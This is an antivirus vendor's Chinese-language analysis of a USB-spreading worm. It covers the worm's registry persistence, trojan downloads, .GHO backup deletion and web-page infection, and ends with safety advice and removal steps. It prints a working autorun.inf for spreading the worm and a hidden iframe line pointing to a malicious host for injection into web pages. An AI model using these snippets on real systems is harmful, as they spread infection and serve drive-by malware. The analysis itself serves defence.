这是一个蠕虫病毒,用nspack加壳程序进行保护。
病毒会利用CreateMutex创建一个"baby"的互斥,保证
系统中只有一个
实例在运行,如这个互斥已经存在,则病毒直接退出。
1、该病毒运行后,驻留内存,释放
文件到%Systemroot%\system32目录下名为:crsss.exe,并删除自身,释放的文件名和系统csrss.exe文件名及其相似,以此来迷惑用户。
2、修改如下注册表项:
(1)HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"crsss" = %SYSTEM%\CRSSS.EXE 达到开机自启动目的
(2)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\Folder\Hidden\SHOWALL
"CheckedValue" 的值为0X00000000,把文件查看设置不显示隐藏,达到隐藏文件显示的目的.
(3)HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
"start page" =
HTTP://WWW.HAO123.COM
修改IE主页为:
HTTP://WWW.HAO123.COM,并且调用系统文件REG.exe不停的在重写该项.
(4)HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage 的值为00000001 ,修改IE主页属性使按钮失效,用户无法更改"主页"栏。
(5)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate下面增加
DisableWindowsUpdateAccess项 并把其键值设为00000001 关闭windows自动更新功能.
3、
下载http://aaa.xxxxxx.cn/htm/up1.txt,
http://aaa.xxxxxx.cn/down/up2.txt到系统文件夹,然后读取up1.txt和up2.txt的内容(up1.txt和up2.txt的内容为下载木马的网址链接),并把下载的木马到系统文件夹,命名为:temp.exe。
4、病毒遍历本地所有存储设备,向可移动存储设备中,写入病毒本身niu.exe和autorun.inf.其中autorun.inf的内容为::
[AutoRun]
open=niu.exe
shell\open=打开(&O)
shell\open\Command=niu.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=niu.EXE
5、每5000毫秒为周期访问系统可用的磁盘,如发现niu.exe和Autorun.inf不在则重写。
6、遍历磁盘,如果找到有*.GHO为后缀名的文件则删除,从而导致用户无法恢复系统(.GHO文件为系统还原工具GHOST的映像文件)
7、遍历磁盘,查找index.php、*.htm、default.php、conn.asp等网页文件,插入一段JS代码: <IfrAmE src=http://aaa.xxxxxx.cn/ceshi.htm width=0 height=0></IfrAmE>,完成网页挂马。
安全建议:
1 安装正版杀毒
软件、个人防火墙和卡卡上网安全
助手,并及时升级,瑞星杀毒软件每天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
瑞星杀毒软件清除办法:
安装瑞星杀毒软件,升级到19.42.20版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。
